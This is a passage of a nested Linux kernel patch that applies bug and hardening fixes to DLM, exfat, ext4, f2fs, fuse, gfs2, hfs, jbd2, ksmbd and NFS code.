+-			dlm_send_ack(node->nodeid, node->seq_next);
+-
+ 			spin_lock(&node->state_lock);
+ 			pr_debug("receive fin msg from node %d with state %s\n",
+ 				 node->nodeid, dlm_state_str(node->state));
+ 
+ 			switch (node->state) {
+ 			case DLM_ESTABLISHED:
++				dlm_send_ack(node->nodeid, node->seq_next);
++
+ 				node->state = DLM_CLOSE_WAIT;
+ 				pr_debug("switch node %d to state %s\n",
+ 					 node->nodeid, dlm_state_str(node->state));
+@@ -503,16 +502,19 @@ static void dlm_midcomms_receive_buffer(union dlm_packet *p,
+ 					node->state = DLM_LAST_ACK;
+ 					pr_debug("switch node %d to state %s case 1\n",
+ 						 node->nodeid, dlm_state_str(node->state));
+-					spin_unlock(&node->state_lock);
+-					goto send_fin;
++					set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
++					dlm_send_fin(node, dlm_pas_fin_ack_rcv);
+ 				}
+ 				break;
+ 			case DLM_FIN_WAIT1:
++				dlm_send_ack(node->nodeid, node->seq_next);
+ 				node->state = DLM_CLOSING;
++				set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
+ 				pr_debug("switch node %d to state %s\n",
+ 					 node->nodeid, dlm_state_str(node->state));
+ 				break;
+ 			case DLM_FIN_WAIT2:
++				dlm_send_ack(node->nodeid, node->seq_next);
+ 				midcomms_node_reset(node);
+ 				pr_debug("switch node %d to state %s\n",
+ 					 node->nodeid, dlm_state_str(node->state));
+@@ -529,8 +531,6 @@ static void dlm_midcomms_receive_buffer(union dlm_packet *p,
+ 				return;
+ 			}
+ 			spin_unlock(&node->state_lock);
+-
+-			set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
+ 			break;
+ 		default:
+ 			WARN_ON(test_bit(DLM_NODE_FLAG_STOP_RX, &node->flags));
+@@ -548,12 +548,6 @@ static void dlm_midcomms_receive_buffer(union dlm_packet *p,
+ 		log_print_ratelimited("ignore dlm msg because seq mismatch, seq: %u, expected: %u, nodeid: %d",
+ 				      seq, node->seq_next, node->nodeid);
+ 	}
+-
+-	return;
+-
+-send_fin:
+-	set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
+-	dlm_send_fin(node, dlm_pas_fin_ack_rcv);
+ }
+ 
+ static struct midcomms_node *
+@@ -1287,11 +1281,11 @@ void dlm_midcomms_remove_member(int nodeid)
+ 		case DLM_CLOSE_WAIT:
+ 			/* passive shutdown DLM_LAST_ACK case 2 */
+ 			node->state = DLM_LAST_ACK;
+-			spin_unlock(&node->state_lock);
+-
+ 			pr_debug("switch node %d to state %s case 2\n",
+ 				 node->nodeid, dlm_state_str(node->state));
+-			goto send_fin;
++			set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
++			dlm_send_fin(node, dlm_pas_fin_ack_rcv);
++			break;
+ 		case DLM_LAST_ACK:
+ 			/* probably receive fin caught it, do nothing */
+ 			break;
+@@ -1307,12 +1301,6 @@ void dlm_midcomms_remove_member(int nodeid)
+ 	spin_unlock(&node->state_lock);
+ 
+ 	srcu_read_unlock(&nodes_srcu, idx);
+-	return;
+-
+-send_fin:
+-	set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
+-	dlm_send_fin(node, dlm_pas_fin_ack_rcv);
+-	srcu_read_unlock(&nodes_srcu, idx);
+ }
+ 
+ static void midcomms_node_release(struct rcu_head *rcu)
+@@ -1343,6 +1331,7 @@ static void midcomms_shutdown(struct midcomms_node *node)
+ 		node->state = DLM_FIN_WAIT1;
+ 		pr_debug("switch node %d to state %s case 2\n",
+ 			 node->nodeid, dlm_state_str(node->state));
++		dlm_send_fin(node, dlm_act_fin_ack_rcv);
+ 		break;
+ 	case DLM_CLOSED:
+ 		/* we have what we want */
+@@ -1356,12 +1345,8 @@ static void midcomms_shutdown(struct midcomms_node *node)
+ 	}
+ 	spin_unlock(&node->state_lock);
+ 
+-	if (node->state == DLM_FIN_WAIT1) {
+-		dlm_send_fin(node, dlm_act_fin_ack_rcv);
+-
+-		if (DLM_DEBUG_FENCE_TERMINATION)
+-			msleep(5000);
+-	}
++	if (DLM_DEBUG_FENCE_TERMINATION)
++		msleep(5000);
+ 
+ 	/* wait for other side dlm + fin */
+ 	ret = wait_event_timeout(node->shutdown_wait,
+diff --git a/fs/erofs/fscache.c b/fs/erofs/fscache.c
+index b04f93bc062a8..076cf8a149ef3 100644
+--- a/fs/erofs/fscache.c
++++ b/fs/erofs/fscache.c
+@@ -398,8 +398,8 @@ static void erofs_fscache_domain_put(struct erofs_domain *domain)
+ 			kern_unmount(erofs_pseudo_mnt);
+ 			erofs_pseudo_mnt = NULL;
+ 		}
+-		mutex_unlock(&erofs_domain_list_lock);
+ 		fscache_relinquish_volume(domain->volume, NULL, false);
++		mutex_unlock(&erofs_domain_list_lock);
+ 		kfree(domain->domain_id);
+ 		kfree(domain);
+ 		return;
+diff --git a/fs/exfat/dir.c b/fs/exfat/dir.c
+index 0fc08fdcba733..15c4f901be369 100644
+--- a/fs/exfat/dir.c
++++ b/fs/exfat/dir.c
+@@ -102,7 +102,7 @@ static int exfat_readdir(struct inode *inode, loff_t *cpos, struct exfat_dir_ent
+ 			clu.dir = ei->hint_bmap.clu;
+ 		}
+ 
+-		while (clu_offset > 0) {
++		while (clu_offset > 0 && clu.dir != EXFAT_EOF_CLUSTER) {
+ 			if (exfat_get_next_cluster(sb, &(clu.dir)))
+ 				return -EIO;
+ 
+@@ -236,10 +236,7 @@ static int exfat_iterate(struct file *file, struct dir_context *ctx)
+ 		fake_offset = 1;
+ 	}
+ 
+-	if (cpos & (DENTRY_SIZE - 1)) {
+-		err = -ENOENT;
+-		goto unlock;
+-	}
++	cpos = round_up(cpos, DENTRY_SIZE);
+ 
+ 	/* name buffer should be allocated before use */
+ 	err = exfat_alloc_namebuf(nb);
+diff --git a/fs/exfat/exfat_fs.h b/fs/exfat/exfat_fs.h
+index a8f8eee4937cb..e0af6ace633cb 100644
+--- a/fs/exfat/exfat_fs.h
++++ b/fs/exfat/exfat_fs.h
+@@ -41,7 +41,7 @@ enum {
+ #define ES_2_ENTRIES		2
+ #define ES_ALL_ENTRIES		0
+ 
+-#define DIR_DELETED		0xFFFF0321
++#define DIR_DELETED		0xFFFFFFF7
+ 
+ /* type values */
+ #define TYPE_UNUSED		0x0000
+diff --git a/fs/exfat/file.c b/fs/exfat/file.c
+index 4e0793f35e8fb..65f97fd2e167d 100644
+--- a/fs/exfat/file.c
++++ b/fs/exfat/file.c
+@@ -211,8 +211,7 @@ void exfat_truncate(struct inode *inode, loff_t size)
+ 	if (err)
+ 		goto write_size;
+ 
+-	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >>
+-				inode->i_blkbits;
++	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >> 9;
+ write_size:
+ 	aligned_size = i_size_read(inode);
+ 	if (aligned_size & (blocksize - 1)) {
+diff --git a/fs/exfat/inode.c b/fs/exfat/inode.c
+index 5590a1e83126c..3a6d6750dbeb6 100644
+--- a/fs/exfat/inode.c
++++ b/fs/exfat/inode.c
+@@ -221,8 +221,7 @@ static int exfat_map_cluster(struct inode *inode, unsigned int clu_offset,
+ 		num_clusters += num_to_be_allocated;
+ 		*clu = new_clu.dir;
+ 
+-		inode->i_blocks +=
+-			num_to_be_allocated << sbi->sect_per_clus_bits;
++		inode->i_blocks += EXFAT_CLU_TO_B(num_to_be_allocated, sbi) >> 9;
+ 
+ 		/*
+ 		 * Move *clu pointer along FAT chains (hole care) because the
+@@ -582,8 +581,7 @@ static int exfat_fill_inode(struct inode *inode, struct exfat_dir_entry *info)
+ 
+ 	exfat_save_attr(inode, info->attr);
+ 
+-	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >>
+-				inode->i_blkbits;
++	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >> 9;
+ 	inode->i_mtime = info->mtime;
+ 	inode->i_ctime = info->mtime;
+ 	ei->i_crtime = info->crtime;
+diff --git a/fs/exfat/namei.c b/fs/exfat/namei.c
+index b617bebc3d0f3..90b0477911449 100644
+--- a/fs/exfat/namei.c
++++ b/fs/exfat/namei.c
+@@ -387,7 +387,7 @@ static int exfat_find_empty_entry(struct inode *inode,
+ 		ei->i_size_ondisk += sbi->cluster_size;
+ 		ei->i_size_aligned += sbi->cluster_size;
+ 		ei->flags = p_dir->flags;
+-		inode->i_blocks += 1 << sbi->sect_per_clus_bits;
++		inode->i_blocks += sbi->cluster_size >> 9;
+ 	}
+ 
+ 	return dentry;
+diff --git a/fs/exfat/super.c b/fs/exfat/super.c
+index 35f0305cd493c..8c32460e031e8 100644
+--- a/fs/exfat/super.c
++++ b/fs/exfat/super.c
+@@ -373,8 +373,7 @@ static int exfat_read_root(struct inode *inode)
+ 	inode->i_op = &exfat_dir_inode_operations;
+ 	inode->i_fop = &exfat_dir_operations;
+ 
+-	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >>
+-				inode->i_blkbits;
++	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >> 9;
+ 	ei->i_pos = ((loff_t)sbi->root_dir << 32) | 0xffffffff;
+ 	ei->i_size_aligned = i_size_read(inode);
+ 	ei->i_size_ondisk = i_size_read(inode);
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index 866772a2e068f..099a87ec9b2ab 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -1422,6 +1422,13 @@ static struct inode *ext4_xattr_inode_create(handle_t *handle,
+ 	uid_t owner[2] = { i_uid_read(inode), i_gid_read(inode) };
+ 	int err;
+ 
++	if (inode->i_sb->s_root == NULL) {
++		ext4_warning(inode->i_sb,
++			     "refuse to create EA inode when umounting");
++		WARN_ON(1);
++		return ERR_PTR(-EINVAL);
++	}
++
+ 	/*
+ 	 * Let the next inode be the goal, so we try and allocate the EA inode
+ 	 * in the same group, or nearby one.
+@@ -2550,9 +2557,8 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 
+ 	is = kzalloc(sizeof(struct ext4_xattr_ibody_find), GFP_NOFS);
+ 	bs = kzalloc(sizeof(struct ext4_xattr_block_find), GFP_NOFS);
+-	buffer = kvmalloc(value_size, GFP_NOFS);
+ 	b_entry_name = kmalloc(entry->e_name_len + 1, GFP_NOFS);
+-	if (!is || !bs || !buffer || !b_entry_name) {
++	if (!is || !bs || !b_entry_name) {
+ 		error = -ENOMEM;
+ 		goto out;
+ 	}
+@@ -2564,12 +2570,18 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 
+ 	/* Save the entry name and the entry value */
+ 	if (entry->e_value_inum) {
++		buffer = kvmalloc(value_size, GFP_NOFS);
++		if (!buffer) {
++			error = -ENOMEM;
++			goto out;
++		}
++
+ 		error = ext4_xattr_inode_get(inode, entry, buffer, value_size);
+ 		if (error)
+ 			goto out;
+ 	} else {
+ 		size_t value_offs = le16_to_cpu(entry->e_value_offs);
+-		memcpy(buffer, (void *)IFIRST(header) + value_offs, value_size);
++		buffer = (void *)IFIRST(header) + value_offs;
+ 	}
+ 
+ 	memcpy(b_entry_name, entry->e_name, entry->e_name_len);
+@@ -2584,25 +2596,26 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 	if (error)
+ 		goto out;
+ 
+-	/* Remove the chosen entry from the inode */
+-	error = ext4_xattr_ibody_set(handle, inode, &i, is);
+-	if (error)
+-		goto out;
+-
+ 	i.value = buffer;
+ 	i.value_len = value_size;
+ 	error = ext4_xattr_block_find(inode, &i, bs);
+ 	if (error)
+ 		goto out;
+ 
+-	/* Add entry which was removed from the inode into the block */
++	/* Move ea entry from the inode into the block */
+ 	error = ext4_xattr_block_set(handle, inode, &i, bs);
+ 	if (error)
+ 		goto out;
+-	error = 0;
++
++	/* Remove the chosen entry from the inode */
++	i.value = NULL;
++	i.value_len = 0;
++	error = ext4_xattr_ibody_set(handle, inode, &i, is);
++
+ out:
+ 	kfree(b_entry_name);
+-	kvfree(buffer);
++	if (entry->e_value_inum && buffer)
++		kvfree(buffer);
+ 	if (is)
+ 		brelse(is->iloc.bh);
+ 	if (bs)
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index a71e818cd67b4..5f4519af98214 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -640,6 +640,9 @@ static void __f2fs_submit_merged_write(struct f2fs_sb_info *sbi,
+ 
+ 	f2fs_down_write(&io->io_rwsem);
+ 
++	if (!io->bio)
++		goto unlock_out;
++
+ 	/* change META to META_FLUSH in the checkpoint procedure */
+ 	if (type >= META_FLUSH) {
+ 		io->fio.type = META_FLUSH;
+@@ -648,6 +651,7 @@ static void __f2fs_submit_merged_write(struct f2fs_sb_info *sbi,
+ 			io->bio->bi_opf |= REQ_PREFLUSH | REQ_FUA;
+ 	}
+ 	__submit_merged_bio(io);
++unlock_out:
+ 	f2fs_up_write(&io->io_rwsem);
+ }
+ 
+@@ -726,7 +730,7 @@ int f2fs_submit_page_bio(struct f2fs_io_info *fio)
+ 	}
+ 
+ 	if (fio->io_wbc && !is_read_io(fio->op))
+-		wbc_account_cgroup_owner(fio->io_wbc, page, PAGE_SIZE);
++		wbc_account_cgroup_owner(fio->io_wbc, fio->page, PAGE_SIZE);
+ 
+ 	inc_page_count(fio->sbi, is_read_io(fio->op) ?
+ 			__read_io_type(page) : WB_DATA_TYPE(fio->page));
+@@ -933,7 +937,7 @@ alloc_new:
+ 	}
+ 
+ 	if (fio->io_wbc)
+-		wbc_account_cgroup_owner(fio->io_wbc, page, PAGE_SIZE);
++		wbc_account_cgroup_owner(fio->io_wbc, fio->page, PAGE_SIZE);
+ 
+ 	inc_page_count(fio->sbi, WB_DATA_TYPE(page));
+ 
+@@ -1007,7 +1011,7 @@ alloc_new:
+ 	}
+ 
+ 	if (fio->io_wbc)
+-		wbc_account_cgroup_owner(fio->io_wbc, bio_page, PAGE_SIZE);
++		wbc_account_cgroup_owner(fio->io_wbc, fio->page, PAGE_SIZE);
+ 
+ 	io->last_block_in_bio = fio->new_blkaddr;
+ 
+diff --git a/fs/f2fs/inline.c b/fs/f2fs/inline.c
+index 21a495234ffd7..7e867dff681dc 100644
+--- a/fs/f2fs/inline.c
++++ b/fs/f2fs/inline.c
+@@ -422,18 +422,17 @@ static int f2fs_move_inline_dirents(struct inode *dir, struct page *ipage,
+ 
+ 	dentry_blk = page_address(page);
+ 
++	/*
++	 * Start by zeroing the full block, to ensure that all unused space is
++	 * zeroed and no uninitialized memory is leaked to disk.
++	 */
++	memset(dentry_blk, 0, F2FS_BLKSIZE);
++
+ 	make_dentry_ptr_inline(dir, &src, inline_dentry);
+ 	make_dentry_ptr_block(dir, &dst, dentry_blk);
+ 
+ 	/* copy data from inline dentry block to new dentry block */
+ 	memcpy(dst.bitmap, src.bitmap, src.nr_bitmap);
+-	memset(dst.bitmap + src.nr_bitmap, 0, dst.nr_bitmap - src.nr_bitmap);
+-	/*
+-	 * we do not need to zero out remainder part of dentry and filename
+-	 * field, since we have used bitmap for marking the usage status of
+-	 * them, besides, we can also ignore copying/zeroing reserved space
+-	 * of dentry block, because them haven't been used so far.
+-	 */
+ 	memcpy(dst.dentry, src.dentry, SIZE_OF_DIR_ENTRY * src.max);
+ 	memcpy(dst.filename, src.filename, src.max * F2FS_SLOT_LEN);
+ 
+diff --git a/fs/f2fs/inode.c b/fs/f2fs/inode.c
+index 9f0d3864d9f13..5d6fd824f74f2 100644
+--- a/fs/f2fs/inode.c
++++ b/fs/f2fs/inode.c
+@@ -708,18 +708,19 @@ void f2fs_update_inode_page(struct inode *inode)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+ 	struct page *node_page;
++	int count = 0;
+ retry:
+ 	node_page = f2fs_get_node_page(sbi, inode->i_ino);
+ 	if (IS_ERR(node_page)) {
+ 		int err = PTR_ERR(node_page);
+ 
+-		if (err == -ENOMEM) {
+-			cond_resched();
++		/* The node block was truncated. */
++		if (err == -ENOENT)
++			return;
++
++		if (err == -ENOMEM || ++count <= DEFAULT_RETRY_IO_COUNT)
+ 			goto retry;
+-		} else if (err != -ENOENT) {
+-			f2fs_stop_checkpoint(sbi, false,
+-					STOP_CP_REASON_UPDATE_INODE);
+-		}
++		f2fs_stop_checkpoint(sbi, false, STOP_CP_REASON_UPDATE_INODE);
+ 		return;
+ 	}
+ 	f2fs_update_inode(inode, node_page);
+diff --git a/fs/fuse/ioctl.c b/fs/fuse/ioctl.c
+index fcce94ace2c23..8ba1545e01f95 100644
+--- a/fs/fuse/ioctl.c
++++ b/fs/fuse/ioctl.c
+@@ -419,6 +419,12 @@ static struct fuse_file *fuse_priv_ioctl_prepare(struct inode *inode)
+ 	struct fuse_mount *fm = get_fuse_mount(inode);
+ 	bool isdir = S_ISDIR(inode->i_mode);
+ 
++	if (!fuse_allow_current_process(fm->fc))
++		return ERR_PTR(-EACCES);
++
++	if (fuse_is_bad(inode))
++		return ERR_PTR(-EIO);
++
+ 	if (!S_ISREG(inode->i_mode) && !isdir)
+ 		return ERR_PTR(-ENOTTY);
+ 
+diff --git a/fs/gfs2/aops.c b/fs/gfs2/aops.c
+index e782b4f1d1043..2f04c0ff7470b 100644
+--- a/fs/gfs2/aops.c
++++ b/fs/gfs2/aops.c
+@@ -127,7 +127,6 @@ static int __gfs2_jdata_writepage(struct page *page, struct writeback_control *w
+ {
+ 	struct inode *inode = page->mapping->host;
+ 	struct gfs2_inode *ip = GFS2_I(inode);
+-	struct gfs2_sbd *sdp = GFS2_SB(inode);
+ 
+ 	if (PageChecked(page)) {
+ 		ClearPageChecked(page);
+@@ -135,7 +134,7 @@ static int __gfs2_jdata_writepage(struct page *page, struct writeback_control *w
+ 			create_empty_buffers(page, inode->i_sb->s_blocksize,
+ 					     BIT(BH_Dirty)|BIT(BH_Uptodate));
+ 		}
+-		gfs2_page_add_databufs(ip, page, 0, sdp->sd_vfs->s_blocksize);
++		gfs2_page_add_databufs(ip, page, 0, PAGE_SIZE);
+ 	}
+ 	return gfs2_write_jdata_page(page, wbc);
+ }
+diff --git a/fs/gfs2/super.c b/fs/gfs2/super.c
+index 011f9e7660ef8..2015bd05cba10 100644
+--- a/fs/gfs2/super.c
++++ b/fs/gfs2/super.c
+@@ -138,8 +138,10 @@ int gfs2_make_fs_rw(struct gfs2_sbd *sdp)
+ 		return -EIO;
+ 
+ 	error = gfs2_find_jhead(sdp->sd_jdesc, &head, false);
+-	if (error || gfs2_withdrawn(sdp))
++	if (error) {
++		gfs2_consist(sdp);
+ 		return error;
++	}
+ 
+ 	if (!(head.lh_flags & GFS2_LOG_HEAD_UNMOUNT)) {
+ 		gfs2_consist(sdp);
+@@ -151,7 +153,9 @@ int gfs2_make_fs_rw(struct gfs2_sbd *sdp)
+ 	gfs2_log_pointers_init(sdp, head.lh_blkno);
+ 
+ 	error = gfs2_quota_init(sdp);
+-	if (!error && !gfs2_withdrawn(sdp))
++	if (!error && gfs2_withdrawn(sdp))
++		error = -EIO;
++	if (!error)
+ 		set_bit(SDF_JOURNAL_LIVE, &sdp->sd_flags);
+ 	return error;
+ }
+diff --git a/fs/hfs/bnode.c b/fs/hfs/bnode.c
+index 2015e42e752a6..6add6ebfef896 100644
+--- a/fs/hfs/bnode.c
++++ b/fs/hfs/bnode.c
+@@ -274,6 +274,7 @@ static struct hfs_bnode *__hfs_bnode_create(struct hfs_btree *tree, u32 cnid)
+ 		tree->node_hash[hash] = node;
+ 		tree->node_hash_cnt++;
+ 	} else {
++		hfs_bnode_get(node2);
+ 		spin_unlock(&tree->hash_lock);
+ 		kfree(node);
+ 		wait_event(node2->lock_wq, !test_bit(HFS_BNODE_NEW, &node2->flags));
+diff --git a/fs/hfsplus/super.c b/fs/hfsplus/super.c
+index 122ed89ebf9f2..1986b4f18a901 100644
+--- a/fs/hfsplus/super.c
++++ b/fs/hfsplus/super.c
+@@ -295,11 +295,11 @@ static void hfsplus_put_super(struct super_block *sb)
+ 		hfsplus_sync_fs(sb, 1);
+ 	}
+ 
++	iput(sbi->alloc_file);
++	iput(sbi->hidden_dir);
+ 	hfs_btree_close(sbi->attr_tree);
+ 	hfs_btree_close(sbi->cat_tree);
+ 	hfs_btree_close(sbi->ext_tree);
+-	iput(sbi->alloc_file);
+-	iput(sbi->hidden_dir);
+ 	kfree(sbi->s_vhdr_buf);
+ 	kfree(sbi->s_backup_vhdr_buf);
+ 	unload_nls(sbi->nls);
+diff --git a/fs/jbd2/transaction.c b/fs/jbd2/transaction.c
+index 6a404ac1c178f..15de1385012eb 100644
+--- a/fs/jbd2/transaction.c
++++ b/fs/jbd2/transaction.c
+@@ -1010,36 +1010,28 @@ repeat:
+ 	 * ie. locked but not dirty) or tune2fs (which may actually have
+ 	 * the buffer dirtied, ugh.)  */
+ 
+-	if (buffer_dirty(bh)) {
++	if (buffer_dirty(bh) && jh->b_transaction) {
++		warn_dirty_buffer(bh);
+ 		/*
+-		 * First question: is this buffer already part of the current
+-		 * transaction or the existing committing transaction?
+-		 */
+-		if (jh->b_transaction) {
+-			J_ASSERT_JH(jh,
+-				jh->b_transaction == transaction ||
+-				jh->b_transaction ==
+-					journal->j_committing_transaction);
+-			if (jh->b_next_transaction)
+-				J_ASSERT_JH(jh, jh->b_next_transaction ==
+-							transaction);
+-			warn_dirty_buffer(bh);
+-		}
+-		/*
+-		 * In any case we need to clean the dirty flag and we must
+-		 * do it under the buffer lock to be sure we don't race
+-		 * with running write-out.
++		 * We need to clean the dirty flag and we must do it under the
++		 * buffer lock to be sure we don't race with running write-out.
+ 		 */
+ 		JBUFFER_TRACE(jh, "Journalling dirty buffer");
+ 		clear_buffer_dirty(bh);
++		/*
++		 * The buffer is going to be added to BJ_Reserved list now and
++		 * nothing guarantees jbd2_journal_dirty_metadata() will be
++		 * ever called for it. So we need to set jbddirty bit here to
++		 * make sure the buffer is dirtied and written out when the
++		 * journaling machinery is done with it.
++		 */
+ 		set_buffer_jbddirty(bh);
+ 	}
+ 
+-	unlock_buffer(bh);
+-
+ 	error = -EROFS;
+ 	if (is_handle_aborted(handle)) {
+ 		spin_unlock(&jh->b_state_lock);
++		unlock_buffer(bh);
+ 		goto out;
+ 	}
+ 	error = 0;
+@@ -1049,8 +1041,10 @@ repeat:
+ 	 * b_next_transaction points to it
+ 	 */
+ 	if (jh->b_transaction == transaction ||
+-	    jh->b_next_transaction == transaction)
++	    jh->b_next_transaction == transaction) {
++		unlock_buffer(bh);
+ 		goto done;
++	}
+ 
+ 	/*
+ 	 * this is the first time this transaction is touching this buffer,
+@@ -1074,10 +1068,24 @@ repeat:
+ 		 */
+ 		smp_wmb();
+ 		spin_lock(&journal->j_list_lock);
++		if (test_clear_buffer_dirty(bh)) {
++			/*
++			 * Execute buffer dirty clearing and jh->b_transaction
++			 * assignment under journal->j_list_lock locked to
++			 * prevent bh being removed from checkpoint list if
++			 * the buffer is in an intermediate state (not dirty
++			 * and jh->b_transaction is NULL).
++			 */
++			JBUFFER_TRACE(jh, "Journalling dirty buffer");
++			set_buffer_jbddirty(bh);
++		}
+ 		__jbd2_journal_file_buffer(jh, transaction, BJ_Reserved);
+ 		spin_unlock(&journal->j_list_lock);
++		unlock_buffer(bh);
+ 		goto done;
+ 	}
++	unlock_buffer(bh);
++
+ 	/*
+ 	 * If there is already a copy-out version of this buffer, then we don't
+ 	 * need to make another one
+diff --git a/fs/ksmbd/smb2misc.c b/fs/ksmbd/smb2misc.c
+index 6e25ace365684..fbdde426dd01d 100644
+--- a/fs/ksmbd/smb2misc.c
++++ b/fs/ksmbd/smb2misc.c
+@@ -149,15 +149,11 @@ static int smb2_get_data_area_len(unsigned int *off, unsigned int *len,
+ 		break;
+ 	case SMB2_LOCK:
+ 	{
+-		int lock_count;
++		unsigned short lock_count;
+ 
+-		/*
+-		 * smb2_lock request size is 48 included single
+-		 * smb2_lock_element structure size.
+-		 */
+-		lock_count = le16_to_cpu(((struct smb2_lock_req *)hdr)->LockCount) - 1;
++		lock_count = le16_to_cpu(((struct smb2_lock_req *)hdr)->LockCount);
+ 		if (lock_count > 0) {
+-			*off = __SMB2_HEADER_STRUCTURE_SIZE + 48;
++			*off = offsetof(struct smb2_lock_req, locks);
+ 			*len = sizeof(struct smb2_lock_element) * lock_count;
+ 		}
+ 		break;
+@@ -412,20 +408,19 @@ int ksmbd_smb2_check_message(struct ksmbd_work *work)
+ 			goto validate_credit;
+ 
+ 		/*
+-		 * windows client also pad up to 8 bytes when compounding.
+-		 * If pad is longer than eight bytes, log the server behavior
+-		 * (once), since may indicate a problem but allow it and
+-		 * continue since the frame is parseable.
++		 * SMB2 NEGOTIATE request will be validated when message
++		 * handling proceeds.
+ 		 */
+-		if (clc_len < len) {
+-			ksmbd_debug(SMB,
+-				    "cli req padded more than expected. Length %d not %d for cmd:%d mid:%llu\n",
+-				    len, clc_len, command,
+-				    le64_to_cpu(hdr->MessageId));
++		if (command == SMB2_NEGOTIATE_HE)
++			goto validate_credit;
++
++		/*
++		 * Allow a message that padded to 8byte boundary.
++		 */
++		if (clc_len < len && (len - clc_len) < 8)
+ 			goto validate_credit;
+-		}
+ 
+-		ksmbd_debug(SMB,
++		pr_err_ratelimited(
+ 			    "cli req too short, len %d not %d. cmd:%d mid:%llu\n",
+ 			    len, clc_len, command,
+ 			    le64_to_cpu(hdr->MessageId));
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index 9b16ee657b51a..0f0f1243a9cbf 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -6642,7 +6642,7 @@ int smb2_cancel(struct ksmbd_work *work)
+ 	struct ksmbd_conn *conn = work->conn;
+ 	struct smb2_hdr *hdr = smb2_get_msg(work->request_buf);
+ 	struct smb2_hdr *chdr;
+-	struct ksmbd_work *cancel_work = NULL, *iter;
++	struct ksmbd_work *iter;
+ 	struct list_head *command_list;
+ 
+ 	ksmbd_debug(SMB, "smb2 cancel called on mid %llu, async flags 0x%x\n",
+@@ -6664,7 +6664,9 @@ int smb2_cancel(struct ksmbd_work *work)
+ 				    "smb2 with AsyncId %llu cancelled command = 0x%x\n",
+ 				    le64_to_cpu(hdr->Id.AsyncId),
+ 				    le16_to_cpu(chdr->Command));
+-			cancel_work = iter;
++			iter->state = KSMBD_WORK_CANCELLED;
++			if (iter->cancel_fn)
++				iter->cancel_fn(iter->cancel_argv);
+ 			break;
+ 		}
+ 		spin_unlock(&conn->request_lock);
+@@ -6683,18 +6685,12 @@ int smb2_cancel(struct ksmbd_work *work)
+ 				    "smb2 with mid %llu cancelled command = 0x%x\n",
+ 				    le64_to_cpu(hdr->MessageId),
+ 				    le16_to_cpu(chdr->Command));
+-			cancel_work = iter;
++			iter->state = KSMBD_WORK_CANCELLED;
+ 			break;
+ 		}
+ 		spin_unlock(&conn->request_lock);
+ 	}
+ 
+-	if (cancel_work) {
+-		cancel_work->state = KSMBD_WORK_CANCELLED;
+-		if (cancel_work->cancel_fn)
+-			cancel_work->cancel_fn(cancel_work->cancel_argv);
+-	}
+-
+ 	/* For SMB2_CANCEL command itself send no response*/
+ 	work->send_no_response = 1;
+ 	return 0;
+@@ -7055,6 +7051,14 @@ skip:
+ 
+ 				ksmbd_vfs_posix_lock_wait(flock);
+ 
++				spin_lock(&work->conn->request_lock);
++				spin_lock(&fp->f_lock);
++				list_del(&work->fp_entry);
++				work->cancel_fn = NULL;
++				kfree(argv);
++				spin_unlock(&fp->f_lock);
++				spin_unlock(&work->conn->request_lock);
++
+ 				if (work->state != KSMBD_WORK_ACTIVE) {
+ 					list_del(&smb_lock->llist);
+ 					spin_lock(&work->conn->llist_lock);
+@@ -7063,9 +7067,6 @@ skip:
+ 					locks_free_lock(flock);
+ 
+ 					if (work->state == KSMBD_WORK_CANCELLED) {
+-						spin_lock(&fp->f_lock);
+-						list_del(&work->fp_entry);
+-						spin_unlock(&fp->f_lock);
+ 						rsp->hdr.Status =
+ 							STATUS_CANCELLED;
+ 						kfree(smb_lock);
+@@ -7087,9 +7088,6 @@ skip:
+ 				list_del(&smb_lock->clist);
+ 				spin_unlock(&work->conn->llist_lock);
+ 
+-				spin_lock(&fp->f_lock);
+-				list_del(&work->fp_entry);
+-				spin_unlock(&fp->f_lock);
+ 				goto retry;
+ 			} else if (!rc) {
+ 				spin_lock(&work->conn->llist_lock);
+diff --git a/fs/ksmbd/vfs_cache.c b/fs/ksmbd/vfs_cache.c
+index da9163b003503..0ae5dd0829e92 100644
+--- a/fs/ksmbd/vfs_cache.c
++++ b/fs/ksmbd/vfs_cache.c
+@@ -364,12 +364,11 @@ static void __put_fd_final(struct ksmbd_work *work, struct ksmbd_file *fp)
+ 
+ static void set_close_state_blocked_works(struct ksmbd_file *fp)
+ {
+-	struct ksmbd_work *cancel_work, *ctmp;
++	struct ksmbd_work *cancel_work;
+ 
+ 	spin_lock(&fp->f_lock);
+-	list_for_each_entry_safe(cancel_work, ctmp, &fp->blocked_works,
++	list_for_each_entry(cancel_work, &fp->blocked_works,
+ 				 fp_entry) {
+-		list_del(&cancel_work->fp_entry);
+ 		cancel_work->state = KSMBD_WORK_CLOSED;
+ 		cancel_work->cancel_fn(cancel_work->cancel_argv);
+ 	}
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index e51044a5f550f..d70da78e698d2 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -10609,7 +10609,9 @@ static void nfs4_disable_swap(struct inode *inode)
+ 	/* The state manager thread will now exit once it is
+ 	 * woken.
+ 	 */
+-	wake_up_var(&NFS_SERVER(inode)->nfs_client->cl_state);
